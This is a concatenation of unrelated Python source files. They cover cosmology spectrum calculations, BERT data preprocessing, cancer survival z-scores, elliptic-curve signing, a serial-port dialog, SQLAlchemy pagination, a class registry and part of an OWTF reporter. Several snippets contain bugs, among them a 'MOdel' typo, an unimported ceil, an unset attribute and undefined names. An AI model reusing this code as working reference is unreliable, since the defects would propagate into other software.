k**l * interp1d(ktemps, bias_ffts)(k) return 4*suppress*np.pi*ret def kappa_integrals(self,k): ''' Since kappa_ijkl only involes one term we can just do them all in one go. The contractions are (1) \delta_{ij} \delta_{kl} (2) \hk_i \hk_j \delta_{kl} (3)\hk_i \hk_j \hk_k \hk_l where \hk = \hat{k} is the unit vector of k. ''' ksq = k**2; kf = k**4 expon = np.exp(-0.5*ksq * (self.XYlin - self.sigma)) suppress = np.exp(-0.5*ksq *self.sigma) ret = np.zeros(self.num_kappa_components) bias_integrands = np.zeros( (self.num_kappa_components,self.N) ) for l in range(self.jn): # l-dep functions mu2fac = 1. - 2.*l/ksq/self.Ylin mu4fac = 1 - 4*l/ksq/self.Ylin + 4*l*(l-1)/(ksq*self.Ylin)**2 bias_integrands[0,:] = 15 * self.Xddot**2 + 10 * self.Xddot*self.Yddot + 3 * self.Yddot**2 bias_integrands[1,:] = 5 * self.Xddot**2 + self.Xddot*self.Yddot + (7*self.Xddot*self.Yddot + 3*self.Yddot**2)*mu2fac bias_integrands[2,:] = 3 * self.Xddot**2 + 6*self.Xddot*self.Yddot*mu2fac + 3*self.Yddot**2*mu4fac if l == 0: bias_integrands = bias_integrands * expon bias_integrands -= bias_integrands[:,-1][:,None] # note that expon(q = infinity) = 1 else: bias_integrands = bias_integrands * expon * self.yq**l # do FFTLog ktemps, bias_ffts = self.sph_kappa.sph(l, bias_integrands) ret += k**l * interp1d(ktemps, bias_ffts)(k) return 4*suppress*np.pi*ret def make_table(self, kmin = 1e-3, kmax = 3, nk = 100, func_name = 'power'): ''' Make a table of different terms of P(k), v(k), sigma(k) between a given 'kmin', 'kmax' and for 'nk' equally spaced values in log10 of k This is the most time consuming part of the code. ''' if func_name == 'power': func = self.p_integrals; iis = np.arange(1+self.num_power_components) elif func_name == 'velocity': func = self.v_integrals; iis = self.vii elif func_name == 'spar': func = self.spar_integrals; iis = self.sparii elif func_name == 'strace': func = self.strace_integrals; iis = self.straceii elif func_name == 'gamma1': func = self.gamma1_integrals; iis = self.gii elif func_name == 'gamma2': func = self.gamma2_integrals; iis = self.gii elif func_name == 'kappa': func = self.kappa_integrals; iis = self.kii pktable = np.zeros([nk, self.num_power_components+1-1]) # one column for ks, but last column in power now the counterterm kv = np.logspace(np.log10(kmin), np.log10(kmax), nk) pktable[:, 0] = kv[:] for foo in range(nk): pktable[foo,iis] = func(kv[foo]) return pktable def make_vtable(self, kmin = 1e-3, kmax = 3, nk = 100): self.vktable = self.make_table(kmin=kmin,kmax=kmax,nk=nk,func_name='velocity') def make_spartable(self, kmin = 1e-3, kmax = 3, nk = 100): self.sparktable = self.make_table(kmin=kmin,kmax=kmax,nk=nk,func_name='spar') def make_stracetable(self, kmin = 1e-3, kmax = 3, nk = 100): self.stracektable = self.make_table(kmin=kmin,kmax=kmax,nk=nk,func_name='strace') def make_gamma1table(self, kmin = 1e-3, kmax = 3, nk = 100): self.gamma1ktable = self.make_table(kmin=kmin,kmax=kmax,nk=nk,func_name='gamma1') def make_gamma2table(self, kmin = 1e-3, kmax = 3, nk = 100): self.gamma2ktable = self.make_table(kmin=kmin,kmax=kmax,nk=nk,func_name='gamma2') def make_kappatable(self, kmin = 1e-3, kmax = 3, nk = 100): self.kappaktable = self.make_table(kmin=kmin,kmax=kmax,nk=nk,func_name='kappa') def convert_sigma_bases(self, basis='Legendre'): ''' Function to convert Tr\sigma and \sigma_\par to the desired basis. These are: - Legendre sigma = sigma_0 delta_ij + sigma_2 (3 k_i k_j - delta_ij)/2 - Polynomial sigma = sigma_0 delta_ij + sigma_2 k_i k_j - los (line of sight, note that sigma_0 = kpar and sigma_2 = kperp in this case) sigma = sigma_0 k_i k_j + sigma_2 (delta_ij - k_i k_j)/2 ''' if self.sparktable is None or self.stracektable is None: print("Error: Need to compute sigma before changing bases!") return 0 kv = self.sparktable[:,0] if basis == 'Legendre': self.s0 = self.stracektable / 3. self.s2 = self.sparktable - self.s0 self.s0[:,0] = kv; self.s2[:,0] = kv if basis == 'Polynomial': self.s0 = 0.5 * (self.stracektable - self.sparktable) self.s2 = 0.5 * (3 * self.sparktable - self.stracektable) self.s0[:,0] = kv; self.s2[:,0] = kv if basis == 'los': self.s0 = self.sparktable self.s2 = self.stracektable - self.sparktable self.s0[:,0] = kv; self.s2[:,0] = kv def convert_gamma_bases(self, basis='Polynomial'): ''' Translates the contraction of gamma into the polynomial/legendre basis given by Im[gamma] = g3 \hk_i \hk_j \hk_k + g1 (\hk_i \delta{ij} + et cycl) / 3 ''' if self.gamma1ktable is None or self.gamma2ktable is None: print("Error: Need to compute sigma before changing bases!") return 0 kv = self.gamma1ktable[:,0] # Polynomial basis if basis == 'Polynomial': self.g1 = 1.5 * self.gamma2ktable - 1.5 * self.gamma1ktable self.g3 = 2.5 * self.gamma1ktable - 1.5 * self.gamma2ktable if basis == 'Legendre': self.g1 = 0.6 * self.gamma2ktable self.g3 = 2.5 * self.gamma1ktable - 1.5 * self.gamma2ktable #self.g1 = self.g1 + 0.6*self.g3 #self.g3 = 0.4 * self.g3 self.g1[:,0] = kv; self.g3[:,0] = kv def convert_kappa_bases(self, basis='Polynomial'): ''' Translates the contraction of gamma into the polynomial basis given by kappa = kappa0 / 3 * (delta_ij delta_kl + perms) + kappa2 / 6 * (k_i k_j delta_kl + perms) + kappa4 * k_i k_j k_k k_l. ''' if self.kappaktable is None: print("Error: Need to compute kappa before changing bases!") return 0 self.kv = self.kappaktable[:,0] self.k0 = 3./8 * (self.kappaktable[:,1] - 2*self.kappaktable[:,2] + self.kappaktable[:,3]) self.k2 = 3./4 * (-self.kappaktable[:,1] + 6*self.kappaktable[:,2] - 5*self.kappaktable[:,3]) self.k4 = 1./8 * (3*self.kappaktable[:,1] - 30*self.kappaktable[:,2] + 35*self.kappaktable[:,3]) # the following functions combine all the components into the spectra given some set # of bias parameters shared between P(k), v(k), sigma(k) # these are, in order, b1, b2, bs, alpha, alpha_v, alpha_s, alpha_s2, sn, sv, s0. def combine_bias_terms_vk(self, b1, b2, bs, b3, alpha_v, sv): ''' Combine all the bias terms into one velocity spectrum. Assumes the P(k) table has already been computed. alpha_v, sv = counterterm and stochastic term. ''' arr = self.vktable if self.third_order: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2, bs, b1*bs, b2*bs, bs**2, b3, b1*b3]) elif self.shear: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2, bs, b1*bs, b2*bs, bs**2]) else: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2]) try: kv = arr[:,0]; za = self.pktable[:,-1] except: print("Compute the power spectrum table first!") pktemp = np.copy(arr)[:,1:] res = np.sum(pktemp * bias_monomials, axis =1) + alpha_v*kv * za + sv*kv return kv, res def combine_bias_terms_sk(self, b1, b2, bs, b3, alpha_s0, alpha_s2, s0_stoch, basis='Polynomial'): ''' Combine all the bias terms into one velocity dispersion spectrum. Assumes the P(k) table has already been computed. alpha_s0, alpha_s2 = counterterm for s0 and s2, s0_stoch = stochastic term for s0. ''' self.convert_sigma_bases(basis=basis) if self.third_order: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2, bs, b1*bs, b2*bs, bs**2, b3, b1*b3]) elif self.shear: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2, bs, b1*bs, b2*bs, bs**2]) else: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2]) # Do the monopole try: arr = self.s0 kv = arr[:,0]; za = self.pktable[:,-1] except: print("Compute the power spectrum table first!") pktemp = np.copy(arr)[:,1:] s0 = np.sum(pktemp * bias_monomials, axis =1) + alpha_s0 * za + s0_stoch# here the counterterm is a zero lag and just gives P_Zel # and the quadratic arr = self.s2 kv = arr[:,0] pktemp = np.copy(arr)[:,1:] s2 = np.sum(pktemp * bias_monomials, axis =1) + alpha_s2 * za # there's now a counterterm here too! return kv, s0 ,s2 def combine_bias_terms_gk(self, b1, b2, bs, b3, alpha_g1, alpha_g3, basis='Polynomial'): self.convert_gamma_bases(basis=basis) if self.third_order: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2, bs, b1*bs, b2*bs, bs**2, b3, b1*b3]) elif self.shear: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2, bs, b1*bs, b2*bs, bs**2]) else: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2]) # Do the monopole try: arr = self.g1 kv = arr[:,0]; za = self.pktable[:,-1] except: print("Compute the power spectrum table first!") pktemp = np.copy(arr)[:,1:] g1 = np.sum(pktemp * bias_monomials, axis =1) + alpha_g1 * za / kv# here the counterterm is a zero lag and just gives P_Zel # and the quadratic arr = self.g3 kv = arr[:,0] pktemp = np.copy(arr)[:,1:] g3 = np.sum(pktemp * bias_monomials, axis =1) + alpha_g3 * za / za # there's now a counterterm here too! return kv, g1, g3 def combine_bias_terms_kk(self, alpha_k2, k0_stoch): try: kv = self.kv za = self.pktable[:,-1] except: print("Compute spectra first!") return self.kv, self.k0 + k0_stoch, self.k2 + alpha_k2 * za / kv**2, self.k4
#!/usr/bin/env python3 # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Script to preprocess the data for BERT.""" import os import sys sys.path.insert(0, os.getcwd()) import argparse import json import numpy as np from code.common import logging from code.bert.tensorrt.helpers.data_processing import read_squad_json, convert_example_to_features from code.bert.tensorrt.helpers.tokenization import BertTokenizer def preprocess_bert(data_dir, model_dir, preprocessed_data_dir): max_seq_length = 384 max_query_length = 64 doc_stride = 128 output_dir = os.path.join(preprocessed_data_dir, "squad_tokenized") os.makedirs(output_dir, exist_ok=True) logging.info("Creating tokenizer...") tokenizer = BertTokenizer(os.path.join(model_dir, "bert", "vocab.txt")) logging.info("Done creating tokenizer.") logging.info("Reading SQuAD examples...") eval_examples = read_squad_json(os.path.join(data_dir, "squad", "dev-v1.1.json")) logging.info("Done reading SQuAD examples.") logging.info("Converting examples to features...") eval_features = [] for example in eval_examples: feature = convert_example_to_features(example.doc_tokens, example.question_text, tokenizer, max_seq_length, doc_stride, max_query_length) eval_features.extend(feature) logging.info("Done converting examples to features.") logging.info("Saving features...") eval_features_num = len(eval_features) input_ids = np.zeros((eval_features_num, max_seq_length), dtype=np.int32) input_mask = np.zeros((eval_features_num, max_seq_length), dtype=np.int32) segment_ids = np.zeros((eval_features_num, max_seq_length), dtype=np.int32) for idx, feature in enumerate(eval_features): print(f"Processing {idx}/{eval_features_num}...") input_ids[idx, :] = np.array(feature.input_ids, dtype=np.int32) input_mask[idx, :] = np.array(feature.input_mask, dtype=np.int32) segment_ids[idx, :] = np.array(feature.segment_ids, dtype=np.int32) np.save(os.path.join(output_dir, "input_ids.npy"), input_ids) np.save(os.path.join(output_dir, "input_mask.npy"), input_mask) np.save(os.path.join(output_dir, "segment_ids.npy"), segment_ids) logging.info("Done saving features.") def main(): parser = argparse.ArgumentParser(description=__doc__) parser.add_argument( "--data_dir", "-d", help="Directory containing the input data.", default="build/data" ) parser.add_argument( "--model_dir", "-m", help="Directory containing the models.", default="build/models" ) parser.add_argument( "--preprocessed_data_dir", "-o", help="Output directory for the preprocessed data.", default="build/preprocessed_data" ) args = parser.parse_args() data_dir = args.data_dir model_dir = args.model_dir preprocessed_data_dir = args.preprocessed_data_dir preprocess_bert(data_dir, model_dir, preprocessed_data_dir) print("Done!") if __name__ == '__main__': main()
<reponame>elifesciences-publications/genomic-features-survival<gh_stars>10-100 #!/usr/bin/env python # encoding: utf-8 ''' Created by <NAME> on 2018-2-12. Given the copy-number-change sizes files generated from the sister script, calculate z-scores first excluding broad mutations, then excluding focal mutations. Copyright (c) 2018. All rights reserved. ''' import pandas as pd import numpy as np import argparse import sys import os import pdb import collections import glob import rpy2 from multiprocessing import Pool sys.path.append('../common/') import utilities as util import analysis import mutation_base FOCAL_CUTOFF = 3e6 # any change larger than 3million bps is a broad change. def get_options(): parser = argparse.ArgumentParser(description='CN Change size zscores') parser.add_argument('-i', action='store', dest='cnv_change_size_dir') parser.add_argument('-c', action='store', dest='clinical_directory') parser.add_argument('-o', action='store', dest='output_directory', default='.') namespace = parser.parse_args() return (namespace.cnv_change_size_dir, namespace.clinical_directory, namespace.output_directory) def calculate_zscores(input_file): input_data = pd.read_csv(input_file, index_col=0) input_data = input_data.dropna(subset=['time', 'censor', 'copy number'], how='any') input_data['focal'] = input_data.continuous_len <= FOCAL_CUTOFF input_data['broad'] = input_data.continuous_len > FOCAL_CUTOFF # print input_data focal_zscore = analysis.do_cox(input_data.time, input_data.censor, input_data['focal']) focal_zscore['focal_count'] = input_data.focal.sum() print focal_zscore return focal_zscore def calculate_broad_change_zscores(input_file): input_data = pd.read_csv(input_file, index_col=0) input_data = input_data.dropna(subset=['time', 'censor', 'copy number'], how='any') input_data['broad'] = input_data.continuous_len > FOCAL_CUTOFF # print input_data broad_zscore = analysis.do_cox(input_data.time, input_data.censor, input_data['broad']) broad_zscore['broad_count'] = input_data.broad.sum() print broad_zscore return broad_zscore def calculate_broad_change_restricted_zscores(input_file): input_data = pd.read_csv(input_file, index_col=0) input_data = input_data.dropna(subset=['time', 'censor', 'copy number'], how='any') print input_data.shape # ignore patients that have a focal change input_data = input_data.drop(input_data[input_data.continuous_len <= FOCAL_CUTOFF].index) input_data['broad'] = input_data.continuous_len > FOCAL_CUTOFF broad_restricted_zscore = analysis.do_cox(input_data.time, input_data.censor, input_data['broad']) broad_restricted_zscore['broad_count'] = input_data.broad.sum() print broad_restricted_zscore return broad_restricted_zscore def calculate_focal_change_restricted_zscores(input_file): input_data = pd.read_csv(input_file, index_col=0) input_data = input_data.dropna(subset=['time', 'censor', 'copy number'], how='any') print input_data.shape # ignore patients that have a broad change input_data = input_data.drop(input_data[input_data.continuous_len > FOCAL_CUTOFF].index) print input_data.shape input_data['focal'] = input_data.continuous_len <= FOCAL_CUTOFF focal_restricted_zscore = analysis.do_cox(input_data.time, input_data.censor, input_data['focal']) focal_restricted_zscore['focal_count'] = input_data.focal.sum() print focal_restricted_zscore return focal_restricted_zscore def calculate_any_change_zscores(input_file): input_data = pd.read_csv(input_file, index_col=0) input_data = input_data.dropna(subset=['time', 'censor', 'copy number'], how='any') print input_data.shape input_data['any_change'] = ~np.isnan(input_data.continuous_len) any_change_zscore = analysis.do_cox(input_data.time, input_data.censor, input_data['any_change']) any_change_zscore['any_change_count'] = input_data.any_change.sum() print any_change_zscore return any_change_zscore def unused(): # exclude_broad = input_data[(input_data.continuous_len <= FOCAL_CUTOFF) | # np.isnan(input_data.continuous_len)] # exclude_broad_zscore = analysis.do_cox(exclude_broad.time, # exclude_broad.censor, exclude_broad['copy number']) # exclude_broad_zscore['included focal count'] = ( # exclude_broad.continuous_len < FOCAL_CUTOFF).sum() # # # exclude_focal = input_data[(input_data.continuous_len > FOCAL_CUTOFF) | # np.isnan(input_data.continuous_len)] # exclude_focal_zscore = analysis.do_cox(exclude_focal.time, # exclude_focal.censor, exclude_focal['copy number']) # exclude_focal_zscore['included broad count'] = ( # exclude_focal.continuous_len >= FOCAL_CUTOFF).sum() return {'exclude_broad': exclude_broad_zscore, 'exclude_focal': exclude_focal_zscore} def multiprocess_zscores(args): input_file = args[0] cancer_type = args[1] gene = args[2] zscores = calculate_any_change_zscores(input_file) return {cancer_type + '_' + gene: zscores} def main(argv=None): cn_change_size_dir, clinical_dir, outdir = get_options() input_files = os.listdir(cn_change_size_dir) input_files = util.remove_extraneous_files(input_files) input_files = [os.path.join(cn_change_size_dir, i) for i in input_files] zscore_inputs = [] results = [] for input_file in input_files: cancer_type = os.path.split(input_file)[1].split('_')[0] gene = os.path.split(input_file)[1].split('_')[1].split('.')[0] print cancer_type, gene # zscore_inputs.append([input_file, cancer_type, gene]) results.append(multiprocess_zscores([input_file, cancer_type, gene])) #p = Pool(4) #results = p.map(multiprocess_zscores, zscore_inputs) with open(os.path.join(outdir, 'cox_any_change_results.csv'), 'w') as out: formatstr = '{},{},{},{}\n' out.write('Cancer Type,Gene,Z Score,Count\n') for cox_dict in results: cancer_type_gene = cox_dict.keys()[0] print cancer_type_gene print cox_dict[cancer_type_gene] d = cox_dict[cancer_type_gene] out.write(formatstr.format(cancer_type_gene.split('_')[0], cancer_type_gene.split('_')[1], d['z'], d['any_change_count'])) if __name__ == "__main__": main()
<gh_stars>1-10 import hmac import random from collections import namedtuple Point = namedtuple('Point', ['x', 'y']) class EllipticCurveBase: """ A generic class for elliptic curves and operations on them. The curves must be of the form: y^2 = x^3 + a*x + b. """ def __init__(self, hash_function): self.hash_function = hash_function def is_on_curve(self, p): """ Checks whether a point is on the curve. Args: p (ECPointAffine): Point to be checked Returns: bool: True if p is on the curve, False otherwise. """ raise NotImplementedError def y_from_x(self, x): """ Computes the y component corresponding to x. Since elliptic curves are symmetric about the x-axis, the x component (and sign) is all that is required to determine a point on the curve. Args: x (int): x component of the point. Returns: tuple: both possible y components of the point. """ raise NotImplementedError def gen_key_pair(self, random_generator=random.SystemRandom()): """ Generates a public/private key pair. Args: random_generator (generator): The random generator to use. Returns: tuple: A private key in the range of 1 to `self.n - 1` and an ECPointAffine containing the public key point. """ raise NotImplementedError def public_key(self, private_key): """ Returns the public (verifying) key for a given private key. Args: private_key (int): the private key to derive the public key for. Returns: ECPointAffine: The point representing the public key. """ raise NotImplementedError def recover_public_key(self, message, signature, recovery_id=None): """ Recovers possibilities for the public key associated with the private key used to sign message and generate signature. Since there are multiple possibilities (two for curves with co-factor = 1), each possibility that successfully verifies the signature is returned. Args: message (bytes): The message that was signed. signature (ECPointAffine): The point representing the signature. recovery_id (int) (Optional): If provided, limits the valid x and y point to only that described by the recovery_id. Returns: list(ECPointAffine): List of points representing valid public keys that verify signature. """ raise NotImplementedError def _sign(self, message, private_key, do_hash=True, secret=None): raise NotImplementedError def sign(self, message, private_key, do_hash=True): """ Signs a message with the given private key. Args: message (bytes): The message to be signed private_key (int): Integer that is the private key do_hash (bool): True if the message should be hashed prior to signing, False if not. This should always be left as True except in special situations which require doing the hash outside (e.g. handling Bitcoin bugs). Returns: (Point, int): The point (r, s) representing the signature and the ID representing which public key possibility is associated with the private key being used to sign. """ return self._sign(message, private_key, do_hash) def verify(self, message, signature, public_key, do_hash=True): """ Verifies that signature was generated with a private key corresponding to public key, operating on message. Args: message (bytes): The message to be signed signature (Point): (r, s) representing the signature public_key (ECPointAffine): ECPointAffine of the public key do_hash (bool): True if the message should be hashed prior to signing, False if not. This should always be left as True except in special situations which require doing the hash outside (e.g. handling Bitcoin bugs). Returns: bool: True if the signature is verified, False otherwise. """ raise NotImplementedError def _nonce_random(self): return random.SystemRandom().randrange(1, self.n - 1) def _nonce_rfc6979(self, private_key, message): """ Computes a deterministic nonce (k) for use when signing according to RFC6979 (https://tools.ietf.org/html/rfc6979), Section 3.2. Args: private_key (int): The private key. message (bytes): A hash of the input message. Returns: int: A deterministic nonce. """ hash_bytes = 32 x = private_key.to_bytes(hash_bytes, 'big') # Message should already be hashed by the time it gets here, # so don't bother doing another hash. x_msg = x + message # Step b V = bytes([0x1] * hash_bytes) # Step c K = bytes([0x0] * hash_bytes) # Step d K = hmac.new(K, V + bytes([0]) + x_msg, self.hash_function).digest() # Step e V = hmac.new(K, V, self.hash_function).digest() # Step f K = hmac.new(K, V + bytes([0x1]) + x_msg, self.hash_function).digest() # Step g V = hmac.new(K, V, self.hash_function).digest() while True: # Step h.1 T = bytes() # Step h.2 while 8 * len(T) < self.nlen: V = hmac.new(K, V, self.hash_function).digest() T += V # Step h.3 k = int.from_bytes(T, 'big') if k >= 1 and k < (self.n - 1): return k K = hmac.new(K, V + bytes([0]), self.hash_function).digest() V = hmac.new(K, V, self.hash_function).digest()
<filename>modal_connection.py __author__ = 'Tarsier' import os import tkinter as tk from tkinter import * from tkinter import ttk from tkinter import simpledialog from settings import Settings import serial.tools.list_ports class ConnectionDialog(simpledialog.Dialog): def body(self, master): self.parent = master self.title('Device Connection') self.frame = tk.Frame(self.parent) self.resizable(width=False, height=False) self.init_classes() self.init_variables() self.init_ui() self.frame.pack(expand=1, fill=BOTH) def init_classes(self): self._settings = Settings() def init_variables(self): self.port_label = StringVar() self.port = StringVar() self.baud = StringVar() self.baud_rates = [1200, 2400, 4800, 9600, 14400, 19200, 38400, 57600, 115200, 128000 , 256000] self.ports = list(serial.tools.list_ports.comports()) self.port_label.set(self._settings.GetSetting('port_label')) self.port.set(self._settings.GetSetting('port')) self.baud.set(self._settings.GetSetting('baud')) self.OK = False ,self.port.get() pass def init_ui(self): self.dir_name = os.path.dirname(os.path.realpath(__file__)) self.img_path = os.path.join(self.dir_name, "images","serial48.png") logo = PhotoImage(file=self.img_path ) self.label_logo = Label(self.frame, image=logo) self.label_logo.image = logo self.label_logo.grid(row=0, column=0, rowspan =2, sticky='W', padx=1, pady=4) self.lbl_WFM = tk.Label(self.frame, text="Device port settings", font='Tahoma 8 bold', fg = 'gray') self.lbl_WFM.grid(row=0, column=1, sticky='W', padx=1, pady=4) self.lbl_Note = tk.Label(self.frame, wraplength= 200, text="Please select port where your GPS device was connected and baud rate", fg ='darkgray') self.lbl_Note.grid(row=1, column=1, sticky='W', padx=1, pady=1) self.lbl_ports = tk.Label(self.frame, text="Serial Port:") self.lbl_ports.grid(row=2, column=0, sticky='W', padx=10, pady=2) self.cbox_ports = ttk.Combobox(self.frame, textvariable=self.port_label, state="readonly", width = 50) self.cbox_ports.bind('<Return>') self.cbox_ports['values'] =self.ports self.cbox_ports.grid(row=2, column=1, sticky="W", pady=3) self.lbl_baud = tk.Label(self.frame, text="Baudrate:") self.lbl_baud.grid(row=3, column=0, sticky='W', padx=10, pady=2) self.cbox_baud = ttk.Combobox(self.frame, textvariable=self.baud, state="readonly", width = 30) self.cbox_baud.bind('<Return>') self.cbox_baud['values'] = self.baud_rates #self.cbox_baud.current(2) # select index 2 (48000) by default self.cbox_baud.grid(row=3, column=1, sticky="W", pady=3) pass def ok(self): sel_port = self.port_label.get().split(' ')[0].strip() print( sel_port) self._settings.SetSettings('port',sel_port) self._settings.SetSettings('port_label', self.port_label.get()) self._settings.SetSettings('baud', self.baud.get()) self.OK = True,self.port.get() self.destroy()
<filename>models/base.py<gh_stars>1-10 from sqlalchemy import orm class QueryProperty(object): """ """ def __init__(self, session): self.session = session def __get__(self, model, Model): mapper = orm.class_mapper(Model) if mapper: if not getattr(Model, 'query_class', None): MOdel.query_class = BaseQuery query_property = Model.query_class(mapper, session=self.session()) return query_property class BaseQuery(orm.Query): """ Objeto de consulta padrão usado para modelos. Esta é uma subclasse de uma classe SQLAlchemy sqlalchemy.orm.query.Query e tem todos os métodos de uma consulta padrão também. """ def paginate(self, page, per_page=20, error_out=True): """ Retorna uma instância de `Pagination` usando os parâmetros de consulta já definidos """ if error_out and page < 1: raise IndexError if per_page is None: per_page = self.DEFAULT_PER_PAGE items = self.page(page, per_page).all() if not items and page != 1 and error_out: raise IndexError # Não há necessidade de contar se estivermos na primeira página e houveram menos itens do que esperávamos. if page == 1 and len(items) < per_page: total = len(items) else: total = self.order_by(None).count() return Pagination(self, page, per_page, total, items) class Pagination(object): def __init__(self, query, page, per_page, total, items): #: O objeto de consulta que foi usado para criar este objeto de paginação. self.query = query #: O atual número da página (1 indexado) self.page = page #: O número de items a ser mostrado em uma página. self.per_page = per_page #: O número total de itens que correspondem à consulta self.items = items if self.per_page == 0: self.pages = 0 else: #: O número total de páginas. self.pages = int(ceil(self.total / float(self.per_page))) #: O número da página anterior. self.prev_num = self.page - 1 #: se existe uma página anterior self.has_prev = self.page > 1 #: O número da próxima página. self.next_num = self.page+1 #: Se existe uma próxima página. self.has_next = self.page < self.pages def prev(self, error_out=False): """ Retorna um objeto de `Pagination` para a página anterior """ assert self.query is not None, \ 'um objeto de `query` é necessário para esse método funcionar' return self.query.paginate(self.page - 1, self.per_page, error_out) def next(self, error_out): """ Retorna um objeto de `Pagination` para a página seguinte """ assert self.query is not None, \ 'um objeto de `query` é necessário para esse método funcionar' return self.query.paginate(self.page + 1, self.per_page, error_out) def set_query_property(model_class, session): model_class.query = QueryProperty(session) class ModelBase(object): """ Classe base para um modelo customizado de qualquer representação de tupla""" #: A classe de consulta usada, `query` é uma instância. #: Por padrão, um `BaseQuery` é usado. query_class = BaseQuery #: uma instância de `query_class` pode ser usada para consultar #: o banco de dados para instâncias deste modelo. query = None from sqlalchemy.ext.declarative import declarative_base Model = declarative_base(cls=ModelBase)
""" registries: classes and functions for registration <NAME> <<EMAIL>> Copyright 2021, <NAME> License: Apache-2.0 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Contents: Library (ChainMap): registry for storing, accessing, and instancing classes and instances. """ from __future__ import annotations import abc from collections.abc import Callable, MutableMapping, Sequence import copy import dataclasses import functools import inspect from typing import Any, ClassVar, Optional, Type, Union from . import traits """ Basic Registration System """ @dataclasses.dataclass class registered(object): """ registered violates the normal python convention of naming classes in capital case because it is only designed to be used as a callable decorator, where lowercase names are the norm. Args: """ wrapped: Callable[..., Optional[Any]] defaults: dict[str, Callable[..., Optional[Any]]] = dataclasses.field( default_factory = dict) namer: Callable[[Any], str] = traits.get_name """ Initialization Methods """ def __call__( self, *args: Any, **kwargs: Any) -> Callable[..., Optional[Any]]: """Allows class to be called as a decorator. Returns: Callable[..., Optional[Any]]: callable after it has been registered. """ # Updates 'wrapped' for proper introspection and traceback. functools.update_wrapper(self, self.wrapped) # Copies key attributes and functions to wrapped item. self.wrapped.register = self.register self.wrapped.registry = self.__class__.registry if inspect.isclass(self.wrapped): self.wrapped.__init_subclass__ = Registrar.__init_subclass__ return self.wrapped(*args, **kwargs) """ Properties """ @property def registry(self) -> MutableMapping[str, Type[Any]]: """Returns internal 'kinds' registry with builtin python types added. Returns: MutableMapping[str, Type[Any]]: dict of str keys and values of Kind subclasses and builtin python types. """ if self.defaults: complete = copy.deepcopy(self._registry) complete.update(self.defaults) return complete else: return self._registry """ Public Methods """ @classmethod def register(cls, item: Type[Any], name: Optional[str] = None) -> None: """Adds 'item' to 'registry'. """ # The default key for storing cls is its snakecase name. key = name or cls.namer(cls) cls.registry[key] = item return @dataclasses.dataclass class Registrar(object): """Mixin which automatically registers subclasses. Args: registry (ClassVar[MutableMapping[str, Type[Any]]]): key names are str names of a subclass (snake_case by default) and values are the subclasses. Defaults to an empty dict. """ registry: ClassVar[MutableMapping[str, Type[Any]]] = {} """ Initialization Methods """ @classmethod def __init_subclass__(cls, *args: Any, **kwargs: Any): """Automatically registers subclass in 'registry'.""" # Because Registrar will often be used as a mixin, it is important to # call other base class '__init_subclass__' methods, if they exist. try: super().__init_subclass__(*args, **kwargs) # type: ignore except AttributeError: pass cls.register(item = cls) """ Public Methods """ @classmethod def register(cls, item: Type[Any], name: Optional[str] = None) -> None: """Adds 'item' to 'registry'. A separate 'register' method is included so that virtual subclasses can also be registered. Args: item (Type[Any]): a class to add to the registry. name (Optional[str]): name to use as the key when 'item' is stored in 'registry'. Defaults to None. If not passed, the 'get_name' method will be used to """ # if abc.ABC not in cls.__bases__: # The default key for storing cls relies on the 'get_name' method, # which usually will use the snakecase name of 'item'. key = name or traits.get_name(item = cls) cls.registry[key] = item return
""" owtf.interface.reporter ~~~~~~~~~~~~~~~~~~~~~~~ The reporter module is in charge of producing the HTML Report as well as provide plugins with common HTML Rendering functions .note:: This is being deprecated. """ import cgi from tornado.template import Loader from owtf.http.requester import requester from owtf.settings import POUTPUT_TEMPLATES_DIR class Reporter(object): def __init__(self): self.requester = None self.Init = False self.Loader = Loader(POUTPUT_TEMPLATES_DIR) self.mNumLinesToShow = 15 self.CounterList = [] self.requester = requester def TransactionTableFromIDs(self, TransactionIDs, NumLinesReq=15, NumLinesRes=15): """ Draws a table of HTTP Transactions """ # functions to get the first lines of a long string transactions = self.transaction.get_by_ids(TransactionIDs) return self.TransactionTableForTransactions(transactions) def TransactionTableForURL(self, UseCache, URL, Method=None, Data=None): transaction = self.requester.get_transaction(UseCache, URL, method=Method, data=Data) return self.TransactionTableForTransactions([transaction]) def TransactionTableForURLList(self, UseCache, URLList, Method=None, Data=None): transactions = self.requester.get_transactions(UseCache, URLList, method=Method, data=Data) return self.TransactionTableForTransactions(transactions) def TransactionTableForTransactions(self, Transactions): return self.Loader.load("transaction_table.html").generate(TransactionList=Transactions) def str(self, *args): try: return str(*args) except TypeError: return args[0] # Input is already Unicode def reset_loader(self): return self.Loader.reset() # ----------------------------------- Methods exported from plugin_helper.py --------------------------------- def cmd_table(self, command): return self.Loader.load("command_table.html").generate(Command=Command) def link_list(self, link_listName, Links): """ Wrapper to allow rendering a bunch of links -without name- as resource links with name = link """ return self.Loader.load("link_list.html").generate(link_listName=link_listName, Links=Links) def resource_linklist(self, ResourceListName, ResourceList): """ Draws an HTML Search box for defined Vuln Search resources """ return self.Loader.load("resource_link_list.html").generate(ResourceListName=ResourceListName, ResourceList=ResourceList) def Tabbedresource_linklist(self, ResourcesList): """ ResourceList = [ "ResourceListName", [["Name1","Resource1"],["Name2","Resource2"]] ] """ TabData = [] Resources = [] for ResourceListName, ResourceList in ResourcesList: TabID = ResourceListName.replace(' ', '_') 